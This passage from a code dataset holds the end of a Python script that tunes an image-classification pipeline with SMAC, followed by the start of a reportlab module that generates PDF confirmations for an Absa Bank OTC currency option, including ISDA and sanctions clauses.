range(len(X)):\n\t\tI = cv2.imread(X[i])\n\t\tI = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n\t\th = surf.surf(I, nr_octaves=octaves, nr_scales=scales, max_points=100)\n\t\th = h.flatten()\n\t\th = np.expand_dims(h, 0)\n\t\tif i == 0:\n\t\t\tf = h\n\t\telse:\n\t\t\tf = np.vstack((f, h))\n\treturn f\n\ndef CNN_all_features(names, cnn):\n\tfrom keras.applications.vgg19 import VGG19\n\tfrom keras.applications.inception_v3 import InceptionV3\n\tfrom keras.applications.vgg19 import preprocess_input\n\tf = []\n\tif cnn == 'VGG':\n\t\tmodel = VGG19(weights='imagenet')\n\t\tdsize = (224, 224)\n\telse:\n\t\tmodel = InceptionV3(weights='imagenet')\n\t\tdsize = (299, 299)\n\tfor i in range(len(names)):\n\t\timg = cv2.imread(names[i])\n\t\timg = cv2.resize(img, dsize=dsize)\n\t\timg = img.astype('float32')\n\t\tx = np.expand_dims(img, axis=0)\n\t\tx = preprocess_input(x)\n\t\tfeatures = model.predict(x)\n\t\tif i == 0:\n\t\t\tf = features\n\t\telse:\n\t\t\tf = np.vstack((f, features))\n\treturn f\n\n\ndef VGG_all_features(names, X):\n\thome = os.path.expanduser('~')\n\tif os.path.exists(home + '/Documents/research/EP_project/data/features/VGG_' + dataset + '.npz'):\n\t\tf = np.load(open(home + '/Documents/research/EP_project/data/features/VGG_' + dataset + '.npz', 'rb'))\n\t\treturn f.f.arr_0[X, :]\n\telse:\n\t\tf = CNN_all_features(names, 'VGG')\n\t\tnp.savez(open(home + '/Documents/research/EP_project/data/features/VGG_' + dataset + '.npz', 'wb'), f)\n\t\treturn f[X, :]\n\ndef inception_all_features(names, X):\n\thome = os.path.expanduser('~')\n\tif os.path.exists(home + '/Documents/research/EP_project/data/features/inception_' + dataset + '.npz'):\n\t\tf = np.load(open(home + '/Documents/research/EP_project/data/features/inception_' + dataset + '.npz', 'rb'))\n\t\treturn f.f.arr_0[X, :]\n\telse:\n\t\tf = CNN_all_features(names, 'inception')\n\t\tnp.savez(open(home + '/Documents/research/EP_project/data/features/inception_' + dataset + '.npz', 'wb'), f)\n\t\treturn f[X, :]\n\n\ndef principal_components(X, whiten=True):\n\tpca = PCA(whiten=whiten)\n\tmaxvar = 0.95\n\tdata = X\n\tX1 = pca.fit(X)\n\tvar = pca.explained_variance_ratio_\n\ts = 0\n\tfor i in range(len(var)):\n\t\ts += var[i]\n\t\tif s >= maxvar:\n\t\t\tbreak\n\tpca = PCA(n_components=i+1)\n\tpca.fit(data)\n\treturn pca\n\n\ndef isomap(X, n_neighbors=5, n_components=2):\n\tiso = Isomap(n_components=n_components, n_neighbors=n_neighbors)\n\tiso.fit(X)\n\treturn iso\n\ndef random_forests(X, y, n_estimators, max_features):\n\tclf = RandomForestClassifier(n_estimators=n_estimators, max_features=max_features, class_weight='balanced')\n\tclf.fit(X, y)\n\treturn clf\n\ndef support_vector_machines(X, y, C, gamma):\n\tclf = svm.SVC(C=C, gamma=gamma, class_weight='balanced', probability=True)\n\tclf.fit(X, y)\n\treturn clf\n\ncs = ConfigurationSpace()\n\nfeature_extraction = CategoricalHyperparameter(\"feature_extraction\", [\"haralick\", \"VGG\", \"Inception\"], default=\"haralick\")\ncs.add_hyperparameter(feature_extraction)\n\n# dimensionality_reduction = CategoricalHyperparameter(\"dimensionality_reduction\", [\"PCA\", \"ISOMAP\"], default=\"PCA\")\n# cs.add_hyperparameter(dimensionality_reduction)\n\nlearning_algorithm = CategoricalHyperparameter(\"learning_algorithm\", [\"SVM\", \"RF\"], default=\"RF\")\ncs.add_hyperparameter(learning_algorithm)\n\nharalick_distance = UniformIntegerHyperparameter(\"haralick_distance\", 1, 3, default=1)\ncs.add_hyperparameter(haralick_distance)\ncond1 = InCondition(child=haralick_distance, parent=feature_extraction, values=[\"haralick\"])\ncs.add_condition(cond1)\n\n# surf_octaves = UniformIntegerHyperparameter(\"surf_octaves\", 3, 6, default=4)\n# surf_scales = UniformIntegerHyperparameter(\"surf_scales\", 5, 8, default=6)\n# cs.add_hyperparameters([surf_octaves, surf_scales])\n# cond1 = InCondition(child=surf_octaves, parent=feature_extraction, values=[\"SURF\"])\n# cond2 = InCondition(child=surf_scales, parent=feature_extraction, values=[\"SURF\"])\n# cs.add_conditions([cond1, cond2])\n\n\nsvm_C = UniformFloatHyperparameter(\"svm_C\", 0.1, 100.0, default=1.0)\ncs.add_hyperparameter(svm_C)\nsvm_gamma = UniformFloatHyperparameter(\"svm_gamma\", 0.01, 8, default=1)\ncs.add_hyperparameter(svm_gamma)\ncond1 = InCondition(child=svm_C, parent=learning_algorithm, values=[\"SVM\"])\ncond2 = InCondition(child=svm_gamma, parent=learning_algorithm, values=[\"SVM\"])\ncs.add_conditions([cond1, cond2])\n\n# pca_whiten = CategoricalHyperparameter(\"pca_whiten\", [True, False], default=True)\n# cs.add_hyperparameter(pca_whiten)\n# cs.add_condition(InCondition(child=pca_whiten, parent=dimensionality_reduction, values=[\"PCA\"]))\n\n# isomap_n_neighbors = UniformIntegerHyperparameter(\"isomap_n_neighbors\", 3, 7, default=5)\n# isomap_n_components = UniformIntegerHyperparameter(\"isomap_n_components\", 2, 4, default=2)\n# cs.add_hyperparameters([isomap_n_neighbors, isomap_n_components])\n# cs.add_condition(InCondition(child=isomap_n_components, parent=dimensionality_reduction, values=[\"ISOMAP\"]))\n# cs.add_condition(InCondition(child=isomap_n_neighbors, parent=dimensionality_reduction, values=[\"ISOMAP\"]))\n\n\nrf_n_estimators = UniformIntegerHyperparameter(\"rf_n_estimators\", 8, 300, default=10)\nrf_max_features = UniformFloatHyperparameter(\"rf_max_features\", 0.3, 0.8, default=0.5)\ncs.add_hyperparameters([rf_max_features, rf_n_estimators])\ncond1 = InCondition(child=rf_n_estimators, parent=learning_algorithm, values=[\"RF\"])\ncond2 = InCondition(child=rf_max_features, parent=learning_algorithm, values=[\"RF\"])\ncs.add_conditions([cond1, cond2])\n\ndef pipeline_from_cfg(cfg):\n\tcfg = {k : cfg[k] for k in cfg if cfg[k]}\n\t# Load the data\n\thome = os.path.expanduser('~')\n\tdata_home = home + '/Documents/research/EP_project/data/datasets/' + dataset + '/'\n\tl1 = os.listdir(data_home)\n\ty = []\n\tnames = []\n\tcnt = 0\n\tfor z in range(len(l1)):\n\t\tif l1[z][0] == '.':\n\t\t\tcontinue\n\t\tl = os.listdir(data_home + l1[z] + '/')\n\t\ty += [z] * len(l)\n\t\tcnt += 1\n\t\tfor i in range(len(l)):\n\t\t\tnames.append(data_home+l1[z]+'/'+l[i])\n\t# Train val split\n\tX = np.empty((len(y), 1))\n\tindices = np.arange(len(y))\n\tX1, _, y1, y_val, id1, _ = train_test_split(X, y, indices, test_size=0.2, random_state=42, shuffle=True)\n\ts = []\n\tf11 = []\n\tval_splits = 3\n\tkf = StratifiedKFold(n_splits=val_splits, random_state=42, shuffle=True)\n\tnames1 = []\n\tfor i in range(len(id1)):\n\t\tnames1.append((names[id1[i]]))\n\tfor idx1, idx2 in kf.split(X1, y1):\n\t\t# Feature extraction\n\t\tids1 = []\n\t\tX_train = []\n\t\ty_train = []\n\t\tfor i in idx1:\n\t\t\tX_train.append(names1[i])\n\t\t\ty_train.append(y1[i])\n\t\t\tids1.append(id1[i])\n\t\tX_val = []\n\t\ty_val = []\n\t\tids2 = []\n\t\tfor i in idx2:\n\t\t\tX_val.append(names1[i])\n\t\t\ty_val.append(y1[i])\n\t\t\tids2.append(id1[i])\n\t\t# Feature extraction\n\t\tf_train = []\n\t\t# f_test = []\n\t\tf_val = []\n\t\tif cfg[\"feature_extraction\"] == \"haralick\":\n\t\t\tf_val = haralick_all_features(X_val, cfg[\"haralick_distance\"])\n\t\t\tf_train = haralick_all_features(X_train, cfg[\"haralick_distance\"])\n\t\telif cfg[\"feature_extraction\"] == \"VGG\":\n\t\t\tf_val = VGG_all_features(names, ids2)\n\t\t\tf_train = VGG_all_features(names, ids1)\n\t\telif cfg[\"feature_extraction\"] == \"Inception\":\n\t\t\tf_val = inception_all_features(names, ids2)\n\t\t\tf_train = inception_all_features(names, ids1)\n\n\t\t# Dimensionality reduction\n\t\tr1 = np.random.choice([1, 2], 1)\n\t\tif r1[0] == 1:\n\t\t\tpca_whiten = np.random.choice([True, False], 1)[0]\n\t\t\tdr = principal_components(f_train, pca_whiten)\n\t\t\tf_train = dr.transform(f_train)\n\t\t\tf_val = dr.transform(f_val)\n\n\t\telif r1[0] == 2:\n\t\t\tisomap_n_neighbors = np.random.choice([3, 4, 5, 6, 7], 1)[0]\n\t\t\tisomap_n_components = np.random.choice([2, 3, 4], 1)[0]\n\t\t\tdr = isomap(f_train, isomap_n_neighbors, isomap_n_components)\n\t\t\tf_train = dr.transform(f_train)\n\t\t\tf_val = dr.transform(f_val)\n\n\t\t# Pre-processing\n\t\tnormalizer = Normalizer().fit(f_train)\n\t\tf_train = normalizer.transform(f_train)\n\t\tf_val = normalizer.transform(f_val)\n\n\t\t# Learning algorithms\n\t\tif cfg[\"learning_algorithm\"] == \"RF\":\n\t\t\tclf = random_forests(f_train, y_train, cfg[\"rf_n_estimators\"], cfg[\"rf_max_features\"])\n\t\telif cfg[\"learning_algorithm\"] == \"SVM\":\n\t\t\tclf = support_vector_machines(f_train, y_train, cfg[\"svm_C\"], cfg[\"svm_gamma\"])\n\t\tp_pred = clf.predict_proba(f_val)\n\t\tf11.append(metrics.log_loss(y_val, p_pred))\n\t\ts.append(clf.score(f_val, y_val))\n\treturn np.mean(f11)\n\ndef test_pipeline_from_cfg(cfg):\n\tcfg = {k : cfg[k] for k in cfg if cfg[k]}\n\t# Load the data\n\thome = os.path.expanduser('~')\n\tdata_home = home + '/Documents/research/EP_project/data/datasets/' + dataset + '/'\n\tl1 = os.listdir(data_home)\n\ts = []\n\tf11 = []\n\tfor k in range(50):\n\t\tcfg = incumbent\n\t\tr1 = np.random.choice([1, 2], 1)\n\t\tdimensionality_reduction = \"PCA\"\n\t\tif r1[0] == 1:\n\t\t\tdimensionality_reduction = \"PCA\"\n\t\telif r1[0] == 2:\n\t\t\tdimensionality_reduction = \"ISOMAP\"\n\t\tX = np.empty((1, 960, 960, 3))\n\t\ty = []\n\t\tnames = []\n\t\tcnt = 0\n\t\tfor z in range(len(l1)):\n\t\t\tif l1[z][0] == '.':\n\t\t\t\tcontinue\n\t\t\tl = os.listdir(data_home + l1[z] + '/')\n\t\t\ty += [z] * len(l)\n\t\t\tcnt += 1\n\t\t\tfor i in range(len(l)):\n\t\t\t\tnames.append(data_home+l1[z]+'/'+l[i])\n\t\t# Train val split\n\t\tX = np.empty((len(y), 1))\n\t\tindices = np.arange(len(y))\n\t\t_, _, y_train, y_val, idx1, idx2 = train_test_split(X, y, indices, test_size=0.2, random_state=42, shuffle=True)\n\n\t\tX_train = []\n\t\tfor i in idx1:\n\t\t\tX_train.append(names[i])\n\t\tX_val = []\n\t\tfor i in idx2:\n\t\t\tX_val.append(names[i])\n\n\t\t# Feature extraction\n\t\tf_train = []\n\t\t# f_test = []\n\t\tf_val = []\n\t\tif cfg[\"feature_extraction\"] == \"haralick\":\n\t\t\tf_val = haralick_all_features(X_val, cfg[\"haralick_distance\"])\n\t\t\tf_train = haralick_all_features(X_train, cfg[\"haralick_distance\"])\n\t\telif cfg[\"feature_extraction\"] == \"VGG\":\n\t\t\tf_val = VGG_all_features(names, idx2)\n\t\t\tf_train = VGG_all_features(names, idx1)\n\t\telif cfg[\"feature_extraction\"] == \"Inception\":\n\t\t\tf_val = inception_all_features(names, idx2)\n\t\t\tf_train = inception_all_features(names, idx1)\n\n\t\t# Dimensionality reduction\n\t\tif dimensionality_reduction == \"PCA\":\n\t\t\tpca_whiten = np.random.choice([True, False], 1)[0]\n\t\t\tdr = principal_components(f_train, pca_whiten)\n\t\t\tf_train = dr.transform(f_train)\n\t\t\tf_val = dr.transform(f_val)\n\n\t\telif dimensionality_reduction == \"ISOMAP\":\n\t\t\tisomap_n_neighbors = np.random.choice([3, 4, 5, 6, 7], 1)[0]\n\t\t\tisomap_n_components = np.random.choice([2, 3, 4], 1)[0]\n\t\t\tdr = isomap(f_train, isomap_n_neighbors, isomap_n_components)\n\t\t\tf_train = dr.transform(f_train)\n\t\t\tf_val = dr.transform(f_val)\n\n\t\t# Pre-processing\n\t\tnormalizer = Normalizer().fit(f_train)\n\t\tf_train = normalizer.transform(f_train)\n\t\tf_val = normalizer.transform(f_val)\n\n\t\t# Learning algorithms\n\t\tif cfg[\"learning_algorithm\"] == \"RF\":\n\t\t\tclf = random_forests(f_train, y_train, cfg[\"rf_n_estimators\"], cfg[\"rf_max_features\"])\n\t\telif cfg[\"learning_algorithm\"] == \"SVM\":\n\t\t\tclf = support_vector_machines(f_train, y_train, cfg[\"svm_C\"], cfg[\"svm_gamma\"])\n\t\tp_pred = clf.predict_proba(f_val)\n\t\tf11.append(metrics.log_loss(y_val, p_pred))\n\t\ts.append(clf.score(f_val, y_val))\n\treturn np.mean(f11)\n\n\nscenario = Scenario({\"run_obj\": \"quality\",\n\t\t\t\t\t \"run_count-limit\": 200,\n\t\t\t\t\t \"cs\": cs,\n\t\t\t\t\t \"deterministic\": \"true\"})\n\n\ndef write_dict(f, dict):\n\tk = dict.keys()\n\tfor i in k:\n\t\tf.write(i + ':' + str(dict[i]) + '\\n')\n\nhome = os.path.expanduser('~')\nsmac = SMAC(scenario=scenario, rng=np.random.RandomState(42), tae_runner=pipeline_from_cfg)\nincumbent = smac.optimize()\npickle.dump(incumbent, open(home + '/Documents/research/EP_project/results/intermediate/smac_dimensionality_reduction_' + dataset + '.pkl', 'wb'), -1)\n# pickle.dump(smac, open(home + '/Documents/research/EP_project/results/intermediate/smac_object_dimensionality_reduction_' + dataset + '.pkl', 'wb'), -1)\ninc_value = pipeline_from_cfg(incumbent)\nprint(\"DIMENSIONALITY REDUCTION AGNOSTIC RESULTS: \\n\")\nprint(\"Validation score: \" + str(inc_value) + '\\n')\nprint(\"Algorithms and hyper-parameters: \\n\")\nprint(incumbent._values)\n\ninc_value1 = test_pipeline_from_cfg(incumbent)\nprint(\"Test score: \" + str(inc_value1) + '\\n')\n\n\nresults_home = home + '/Documents/research/EP_project/results/experiments/'\nf = open(results_home + 'smac_' + dataset + '.txt', 'a')\nf.write(\"DIMENSIONALITY REDUCTION AGNOSTIC RESULTS: \\n\")\nf.write(\"Validation score: \" + str(inc_value) + '\\n')\nf.write(\"Algorithms and hyper-parameters: \\n\")\nwrite_dict(f, incumbent._values)\nf.write(\"Test score: \" + str(inc_value1) + '\\n')\nf.close()\n","sub_path":"prototypes/smac_pipeline_agnostic_dimensionality_reduction.py","file_name":"smac_pipeline_agnostic_dimensionality_reduction.py","file_ext":"py","file_size_in_byte":13609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"188509144","text":"import ael\nimport time\nfrom reportlab.pdfgen.canvas import Canvas\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.lib.units import inch, cm\nfrom reportlab.platypus import Paragraph, Frame, Spacer\nfrom STATIC_TEMPLATE import BuildLogos, BuildFooter\nfrom zak_funcs import formnum\nfrom PIL import Image\n\n\ndef ShortMod1(canvas, t):\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n \n Text1 = (' ')\n Text2 =('The purpose of this letter agreement (this \"Confirmation\") is to confirm the terms and conditions of the\\\n transaction referred to above and entered into on the Trade Date specified below (\"this Transaction\"), between\\\n Absa Bank Limited (\"ABSA\") and ' + t.counterparty_ptynbr.fullname +' (\"Counterparty\"). This Confirmation supersedes any previous Confirmation\\\n or other communication with respect to this Transaction and evidences a complete and binding agreement between \\\n us as to the terms of this Transaction. This communication constitutes a Confirmation as referred to in the\\\n Agreement specified below.')\n \n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12,\\\n spaceAfter =255, alignment = 4)\n \n para1 = Paragraph(Text1, bodyStyle1)\n para2 = Paragraph(Text2, bodyStyle1)\n \n mydata = [para1, para2]\n \n frame.addFromList(mydata, canvas)\n \ndef ShortMod2(canvas, t):\n \n #ISDA Master Agreement Date\n nbr = t.counterparty_ptynbr.ptynbr\n a = ael.Agreement.select(\"counterparty_ptynbr = %i\" %nbr)\n ISDA = '0001-01-01'\n for i in a:\n if i.dated == ' ':\n ISDA = '0001-01-01'\n else: \n ISDA = i.dated.to_string('%d %B %Y')\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0 )\n \n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.5 * cm, 15.73*cm, '1.')\n Text2 = ('This Confirmation supplements, forms a part of and is subject to, the ISDA Master Agreement\\\n entered into between Absa and the Counterparty dated as of '+ISDA+', as amended and supplemented\\\n from time to time (the \"Agreement\"). All provisions contained in the Agreement govern this\\\n Confirmation except as expressly modified below.')\n Text1 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =330,\\\n alignment = 4, leftIndent = 15)\n \n para1 = Paragraph(Text1, bodyStyle1)\n para2 = Paragraph(Text2, bodyStyle1)\n \n mydata = [para1, para2]\n \n frame.addFromList(mydata, canvas)\n \ndef ShortMod3(canvas):\n \n canvas.drawString(4.5 * cm, 20.0*cm, 'OTC Currency Option Transaction') # Subject\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.5 * cm, 14.0*cm, '2.')\n Text1 = ('Definitions. This Confirmation is subject to and incorporates the 2006 ISDA Definitions as\\\n published by the International Swap Derivatives Association, Inc. (\"ISDA\") and the 1998 FX and Currency\\\n Option Definitions as published by ISDA, the Emerging Markets Traders Association and The Foreign Exchange\\\n Committee (the \"FX Definitions\", and together with the 2006 Definitions, the \"Definitions\"). In the event\\\n of any inconsistency between this Confirmation and the Definitions or the Agreement, this Confirmation will\\\n govern for the purposes of the Transaction. In the event of any inconsistency between the 2000 Definitions\\\n and the FX Definitions, the FX Definitions will govern. References herein to a \"Transaction\" shall be\\\n deemed to be references to a \"Swap Transaction\" for the purposes of the Definitions. Capitalised terms\\\n used in this Confirmation and not defined in this Confirmation or the Definitions shall have the respective\\\n meanings assigned in the Agreement.\"')\n \n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =380,\\\n alignment = 4, leftIndent = 15)\n \n para1 = Paragraph(Text1, bodyStyle1)\n para2 = Paragraph(Text2, bodyStyle1)\n \n mydata = [para2, para1]\n \n frame.addFromList(mydata, canvas)\n canvas.showPage() \n \ndef ShortMod4(canvas):\n\n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(3.4 * cm, 23.3*cm, '(ii)')\n canvas.drawString(4.1 * cm, 20.39*cm, '(a)')\n canvas.drawString(4.1 * cm, 19.45*cm, '(b)')\n canvas.drawString(4.1 * cm, 18.53*cm, '(c)')\n canvas.drawString(3.4 * cm, 15.93*cm, '(iv) ')\n canvas.drawString(3.4 * cm, 14.5*cm, '(i) ')\n canvas.drawString(3.4 * cm, 13.65*cm, '(ii) ')\n canvas.drawString(3.4 * cm, 12.2*cm, '(i) ')\n canvas.drawString(3.4 * cm, 11.29*cm, '(ii) ')\n \n Text1 =('4. Additional Representations:')\n Text3 =('Additional Representations, as defined and contemplated in the Agreement, will apply and for the purpose\\\n of Section 3 of the Agreement, each of the following will constitute an Additional Representation in respect\\\n of this Transaction. In respect of each Additional Representation each of us as a party to the Transaction\\\n represents to the other on the date on which this Transaction is entered into and will be deemed to\\\n represent continuously for the duration of the term of this Transaction and at all times until the \\\n termination of this Transaction that:')\n Text4 =('4.1 Non Reliance. ') \n Text5 =('(i) Each of us is acting for its own account, ') \n Text6 =(' Each of us has made its own independent decisions based upon its own judgment and upon advice from such\\\n advisors as it has deemed necessary to obtain as to whether or not:')\n Text7 =('(a) to enter into this Transaction,')\n Text8 =('(b) it is suitable, appropriate or proper to enter in this Transaction,')\n Text9 =('(c) it has the capacity to enter into this Transaction;')\n Text10 =('(iii) Each of us has entered into this Transaction:')\n Text11 =(' in reliance upon such investment, financial, legal, regulatory, tax, accounting, actuarial and other advice as it deemed necessary;') \n Text12 =(' not relying in any manner on any view, proposal, guidance, advice or opinion expressed by the other one of us;')\n Text13 =(' not relying in any manner on any communication (written or oral) of the other one of us as investment,\\\n financial, legal, regulatory, tax, accounting, actuarial and other advice, it being understood that any\\\n information and explanations relating to the terms and conditions of this Transaction shall not be \\\n considered or construed as investment, financial, legal, regulatory, tax, accounting, actuarial and \\\n other advice or as a proposal, guidance or recommendation to enter into this Transaction;') \n Text14 =(' None of us has received from the other one any assurance, warranty or guarantee as to the expected\\\n results or financial or investment returns of or related to this Transaction.')\n Text15 =('4.2 Assessment and Understanding.') \n Text16 =('Each of us is capable of assessing the merits of and understanding, and in fact understands and\\\n accepts the terms, conditions of, associated with and related to this Transaction; and') \n Text17 =('Each of us is capable of assessing and assuming the risks of whatsoever nature, and in fact\\\n accepts and assumes all the risks of, associated with and related to this Transaction.')\n Text18 =('4.3 Status of Parties.')\n Text19 =(' None of us is acting as a fiduciary for or as an advisor of whatsoever nature or kind to the other\\\n one of us in respect of this Transaction;') \n Text20 =(' Each of us will be liable as principal for its own obligations under this Transaction read with\\\n the Agreement and schedule elections incorporated by reference in this Confirmation.')\n Text21 =('4.4 Purpose.') \n Text22 =('Each of us has entered into this Transaction:') \n Text23 =('(i) for the purpose of managing its borrowings or investments, and/or')\n Text24 =('(ii) for the purpose of hedging its assets or liabilities; and/or')\n Text25 =('(iii) in connection with a line of its business.')\n \n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle2 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle3 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle4 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 55, bulletIndent = 18)\n bodyStyle5 = ParagraphStyle('Text', spaceBefore=4, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle6 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15) \n bodyStyle7 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 75) \n bodyStyle8 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 67) \n bodyStyle9 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 87) \n bodyStyle10 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 70) \n \n para1 = Paragraph(Text1, bodyStyle1)\n para3 = Paragraph(Text3, bodyStyle2)\n para4 = Paragraph(Text4, bodyStyle3)\n para5 = Paragraph(Text5, bodyStyle4)\n para6 = Paragraph(Text6, bodyStyle8)\n para7 = Paragraph(Text7, bodyStyle7)\n para8 = Paragraph(Text8, bodyStyle7)\n para9 = Paragraph(Text9, bodyStyle7)\n para10 = Paragraph(Text10, bodyStyle4)\n para11 = Paragraph(Text11, bodyStyle9)\n para12 = Paragraph(Text12, bodyStyle9)\n para13 = Paragraph(Text13, bodyStyle9)\n para14 = Paragraph(Text14, bodyStyle10)\n para15 = Paragraph(Text15, bodyStyle3)\n para16 = Paragraph(Text16, bodyStyle10)\n para17 = Paragraph(Text17, bodyStyle10)\n para18 = Paragraph(Text18, bodyStyle3)\n para19 = Paragraph(Text19, bodyStyle10)\n para20 = Paragraph(Text20, bodyStyle10)\n para21 = Paragraph(Text21, bodyStyle3)\n para22 = Paragraph(Text22, bodyStyle4)\n para23 = Paragraph(Text23, bodyStyle4)\n para24 = Paragraph(Text24, bodyStyle4)\n para25 = Paragraph(Text25, bodyStyle4)\n \n mydata = [para1, para3, para4, para5, para6,\\\n para7, para8, para9, para10, para11,\\\n para12, para13, para14, para15, para16,\\\n para17, para18, para19, para20, para21, para22,\\\n para23, para24, para25]\n \n frame.addFromList(mydata, canvas) \n canvas.showPage()\n \ndef ShortMod5(canvas):\n\n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(3.4 * cm, 21.78*cm, '(b)')\n canvas.drawString(3.4 * cm, 19.9*cm, '(d)')\n canvas.drawString(3.4 * cm, 17.5*cm, '(b)')\n \n Text1 =('5. Additional Termination Events:')\n Text2 =('You represent to us on the date on which this Transaction is entered into and will be deemed to represent\\\n continuously for the duration of the term of this Transaction and at all times until the termination of this\\\n Transaction that:')\n Text3 =('5.1 you are not a sanctioned entity; and ') \n Text4 =('5.2 this Transaction is not a sanctioned transaction.')\n Text5 =('Notwithstanding the provisions of the Agreement, including but not limited to Section 5(c)(ii) of the\\\n Agreement, any misrepresentation in respect of paragraph 5.1 and 5.2 above shall constitute an Illegality\\\n as contemplated in Section 5(b)(i) of the Agreement with this Transaction as the Affected Transaction.')\n Text6 =('For purposes of these representations:')\n Text7 =('\"sanctioned entity\" means an entity that:')\n Text8 =('(a) is listed in any sanction list and/or')\n Text9 =(' is subject to some form of financial or economic limitations, or in respect of which there is some form\\\n of financial or economic limitation on other parties dealing with it, in terms of the applicable law and/or ') \n Text10 =('(c) is located or incorporated in a sanctioned jurisdiction and/or ')\n Text11 =(' is owned or controlled by an entity that is located or incorporated in a sanctioned jurisdiction and/or ')\n Text12 =('(e) undertakes significant business activity in a sanctioned jurisdiction;')\n Text13 =('\"sanctioned jurisdiction \" means a country or territory:')\n Text14 =('(a) that is listed in a sanction list and/or ') \n Text15 =(' in respect of which there is some form of financial or economic limitation on other persons or \\\n countries dealing with or making payments or deliveries to or receiving payments or deliveries from\\\n such country or territory, in terms of the applicable law;')\n Text16 =('\"sanction list\" means any of the sanction lists of HM Treasury in the United Kingdom\\\n of Britain and Northern Ireland, the Bank of England, the Office of Foreign Asset Control and/or the\\\n United Nations Security Council (each as amended, supplemented or substituted from time to time); and') \n Text17 =('\"sanctioned transaction\" means any payment, receipt or delivery of cash or assets to or\\\n from an entity that is a sanctioned entity or is located within a sanctioned jurisdiction;')\n Text18 =('\"applicable law\" as contemplated in Section 5(b)(i) of the Agreement and any related sections\\\n of the Agreement and this Confirmation includes, without limitation, all laws, regulations, rules,\\\n directives and policies regarding the combating of criminal activities, money laundering and terrorist\\\n financing issued by any statutory, regulatory, supervisory and/or other governmental agency of any\\\n country in which payment, delivery or compliance is required by either one of us or any Credit Support\\\n Provider of any one of us, as the case may be.\"') \n \n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle2 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle3 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle4 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 55)\n bodyStyle5 = ParagraphStyle('Text', spaceBefore=4, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle6 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15) \n bodyStyle7 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 75) \n bodyStyle8 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 70)\n \n para1 = Paragraph(Text1, bodyStyle1)\n para2 = Paragraph(Text2, bodyStyle2)\n para3 = Paragraph(Text3, bodyStyle2)\n para4 = Paragraph(Text4, bodyStyle2)\n para5 = Paragraph(Text5, bodyStyle2)\n para6 = Paragraph(Text6, bodyStyle2)\n para7 = Paragraph(Text7, bodyStyle2)\n para8 = Paragraph(Text8, bodyStyle4)\n para9 = Paragraph(Text9, bodyStyle8)\n para10 = Paragraph(Text10, bodyStyle4)\n para11 = Paragraph(Text11, bodyStyle8)\n para12 = Paragraph(Text12, bodyStyle4)\n para13 = Paragraph(Text13, bodyStyle2)\n para14 = Paragraph(Text14, bodyStyle4)\n para15 = Paragraph(Text15, bodyStyle8)\n para16 = Paragraph(Text16, bodyStyle2)\n para17 = Paragraph(Text17, bodyStyle2)\n para18 = Paragraph(Text18, bodyStyle2)\n \n mydata = [para1, para2, para3, para4, para5,\\\n para6, para7, para8, para9, 